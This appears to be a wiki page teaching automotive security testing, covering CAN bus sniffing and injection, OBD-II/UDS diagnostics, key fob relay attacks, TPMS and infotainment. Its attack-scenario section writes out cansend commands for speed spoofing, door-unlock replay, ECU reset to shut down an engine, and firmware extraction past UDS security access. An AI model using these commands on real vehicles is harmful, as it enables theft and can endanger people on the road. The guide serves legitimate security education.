Automotive Security

Security testing for vehicle systems - CAN bus, LIN, OBD-II, and connected car security.

Skill Level: Advanced Prerequisites: Embedded systems, networking, automotive protocols

Overview

Vehicle attack surfaces:
- CAN bus (internal communication)
- OBD-II port (diagnostic access)
- Infotainment systems (Android/Linux)
- Telematics (cellular, GPS)
- Bluetooth/WiFi
- Key fobs (RF)
- TPMS (tire pressure sensors)

CAN Bus (Controller Area Network)

Basics

- Broadcast protocol (all nodes see all messages)
- No authentication (by design)
- 11-bit or 29-bit identifiers
- Up to 8 bytes data per frame
- Speeds: 125 kbps to 1 Mbps

Hardware

Required:
- CAN interface: CANtact, PCAN-USB, Kvaser
- OBD-II to DB9 cable
- Linux laptop with can-utils

Budget options:
- Arduino + MCP2515 CAN shield (~$15)
- ELM327 (limited, read-only OBD)

Setup

# Load CAN kernel modules
sudo modprobe can
sudo modprobe can_raw
sudo modprobe can_bcm
sudo modprobe vcan  # Virtual CAN for testing

# Create virtual CAN interface (testing)
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0

# Setup real interface (CANtact/similar)
sudo slcand -o -c -s6 /dev/ttyACM0 can0
sudo ip link set up can0

# Or with specific bitrate
sudo ip link set can0 type can bitrate 500000
sudo ip link set up can0

Sniffing

# can-utils - candump
candump can0
candump can0 -L  # Log format
candump can0 -c  # Color output

# Expected output:
# can0  7DF   [8]  02 01 00 00 00 00 00 00
# can0  7E8   [8]  06 41 00 BE 3F A8 11 00

# Filter specific IDs
candump can0,7DF:7FF  # Only 7DF-7FF range

# Save to file
candump -l can0  # Creates candump-YYYY-MM-DD_HHMMSS.log

Analysis

# cansniffer - Show changing bytes
cansniffer can0

# Highlight changes in real-time
# Press '-' to filter out static messages

# canplayer - Replay captured traffic
canplayer -I candump-log.log can0

# cangen - Generate random CAN traffic (testing)
cangen can0 -g 100 -I 123

Injection

# Send single frame
cansend can0 7DF#0201000000000000

# Send frame with specific data
cansend can0 123#DEADBEEF

# Replay attack
canplayer -I capture.log can0

# Continuous injection
while true; do cansend can0 123#0102030405060708; sleep 0.01; done

Fuzzing

# can-utils cangen (random)
cangen can0 -g 10 -I i  # Random IDs, 10ms gap

# caringcaribou (automotive fuzzer)
# https://github.com/CaringCaribou/caringcaribou
caringcaribou -i can0 uds discovery
caringcaribou -i can0 uds services 0x7e0

# Custom fuzzer
for id in $(seq 0 2047); do
    cansend can0 $(printf '%03X' $id)#0102030405060708
    sleep 0.01
done

OBD-II (On-Board Diagnostics)

Basics

- Mandatory on all US vehicles since 1996
- Standardized connector location (driver's side)
- Protocols: CAN, ISO 9141-2, KWP2000, SAE J1850

Standard PIDs (Parameter IDs):
- 01 00: Supported PIDs
- 01 0C: Engine RPM
- 01 0D: Vehicle speed
- 01 2F: Fuel tank level

Tools

# ELM327 adapter (budget, read-only)
# Connect via Bluetooth/USB/WiFi

# python-OBD
pip install obd

python3 << 'EOF'
import obd
connection = obd.OBD()  # Auto-connect
print(connection.query(obd.commands.RPM))
print(connection.query(obd.commands.SPEED))
EOF

# Output:
# 1500 RPM
# 60 kph

UDS (Unified Diagnostic Services)

# UDS is ISO 14229 - standard diagnostic protocol

# Common services:
# 0x10: Diagnostic Session Control
# 0x11: ECU Reset
# 0x22: Read Data By Identifier
# 0x27: Security Access
# 0x2E: Write Data By Identifier
# 0x31: Routine Control
# 0x34/35/36/37: Upload/Download

# Using caringcaribou
caringcaribou -i can0 uds discovery
caringcaribou -i can0 uds services 0x7e0
caringcaribou -i can0 uds subservices 0x7e0 0x27  # Security access

# Brute force security access (seed-key)
caringcaribou -i can0 uds security_seed 0x7e0 1

Attack Scenarios

Speed Spoofing

# Find speed CAN ID (usually instrument cluster)
# Use cansniffer while driving at constant speed

# Inject false speed
cansend can0 ABC#00FF00000000  # Specific to vehicle

# Can affect:
# - Speedometer display
# - ADAS systems
# - Transmission behavior

Door Unlock

# Monitor CAN bus while using key fob
candump can0 > baseline.log
# Press unlock on key fob
candump can0 > unlock.log

# Compare to find unlock message
diff baseline.log unlock.log

# Replay unlock command
cansend can0 [ID]#[DATA]

Engine Shutdown

# Find ECU diagnostic IDs (usually 7E0-7EF range)
# Send diagnostic session + ECU reset

# Enter diagnostic session
cansend can0 7E0#0210010000000000

# Send ECU reset (soft reset)
cansend can0 7E0#0211010000000000

Firmware Extraction

# UDS firmware download
# Requires bypassing security access first

# 1. Enter extended diagnostic session
cansend can0 7E0#0210030000000000

# 2. Security access (need seed-key algorithm)
cansend can0 7E0#0227010000000000  # Request seed
# Calculate key from seed
cansend can0 7E0#022702[KEY]  # Send key

# 3. Request upload
cansend can0 7E0#103400[address][size]

# 4. Transfer data
cansend can0 7E0#3601...  # Read chunks

Key Fob Attacks

Relay Attack

Equipment:
- 2x SDR devices (HackRF, RTL-SDR)
- Amplifiers
- Yagi antennas

Attack:
1. Device A near car, Device B near owner
2. Relay RF signals between devices
3. Car thinks key is nearby
4. Unlock/start vehicle

Rolling Code Analysis

# Capture with RTL-SDR + GNU Radio
# Most modern vehicles use rolling codes (KeeLoq, etc.)

# Universal Radio Hacker (URH)
# https://github.com/jopohl/urh
urh  # GUI for signal analysis

# Analyze captured signals
# Look for patterns, synchronization

TPMS (Tire Pressure)

# Usually 315 MHz (US) or 433 MHz (EU)
# Often unencrypted

# Capture with RTL-SDR
rtl_433 -f 315M

# Can potentially:
# - Track vehicles by TPMS ID
# - Spoof low pressure warnings
# - Cause driver distraction

Infotainment Systems

Attack Surface

- USB ports (often run as root)
- Bluetooth (pairing, profile attacks)
- WiFi (if equipped)
- Cellular (telematics)
- Navigation data (SD cards)
- App stores (Tesla, Android Auto)

Testing

# USB: Check for update mechanisms
# Many accept USB drives for firmware updates

# Bluetooth: Standard BLE/BR/EDR attacks
# See wireless.md and iot-protocols.md

# Root access: Many run Linux/Android
adb connect [IP]  # If ADB exposed

Tools

# can-utils
sudo apt install can-utils

# Caring Caribou
https://github.com/CaringCaribou/caringcaribou
pip install caringcaribou

# ICSim (Instrument Cluster Simulator)
https://github.com/zombieCraig/ICSim
# Practice without real vehicle

# Kayak
https://github.com/dschanoeh/Kayak
# Java-based CAN analysis

# SavvyCAN
https://github.com/collin80/SavvyCAN
# GUI for CAN analysis

# Vehicle Spy (commercial)
# CANalyzer (commercial)

Legal Considerations

⚠️ IMPORTANT:
- Only test on vehicles you own or have written permission
- Never test on public roads while driving
- Some attacks may void warranties
- May violate CFAA (US) or similar laws
- Automotive OEMs may pursue legal action

Hardware Hacking - Physical security testing
Wireless Testing - RF attacks
IoT Protocols - Related protocols

PreviousIoT Protocols NextWebAuthn & Passkeys

Last updated 8 days ago

Was this helpful?

hashtagOverview

hashtagCAN Bus (Controller Area Network)

hashtagBasics

hashtagHardware

hashtagSetup

hashtagSniffing

hashtagAnalysis

hashtagInjection

hashtagFuzzing

hashtagOBD-II (On-Board Diagnostics)

hashtagBasics

hashtagTools

hashtagUDS (Unified Diagnostic Services)

hashtagAttack Scenarios

hashtagSpeed Spoofing

hashtagDoor Unlock

hashtagEngine Shutdown

hashtagFirmware Extraction

hashtagKey Fob Attacks

hashtagRelay Attack

hashtagRolling Code Analysis

hashtagTPMS (Tire Pressure)

hashtagInfotainment Systems

hashtagAttack Surface

hashtagTesting

hashtagTools

hashtagLegal Considerations

hashtagRelated Topics

Overview

CAN Bus (Controller Area Network)

Basics

Hardware

Setup

Sniffing

Analysis

Injection

Fuzzing

OBD-II (On-Board Diagnostics)

Basics

Tools

UDS (Unified Diagnostic Services)

Attack Scenarios

Speed Spoofing

Door Unlock

Engine Shutdown

Firmware Extraction

Key Fob Attacks

Relay Attack

Rolling Code Analysis

TPMS (Tire Pressure)

Infotainment Systems

Attack Surface

Testing

Tools

Legal Considerations

Related Topics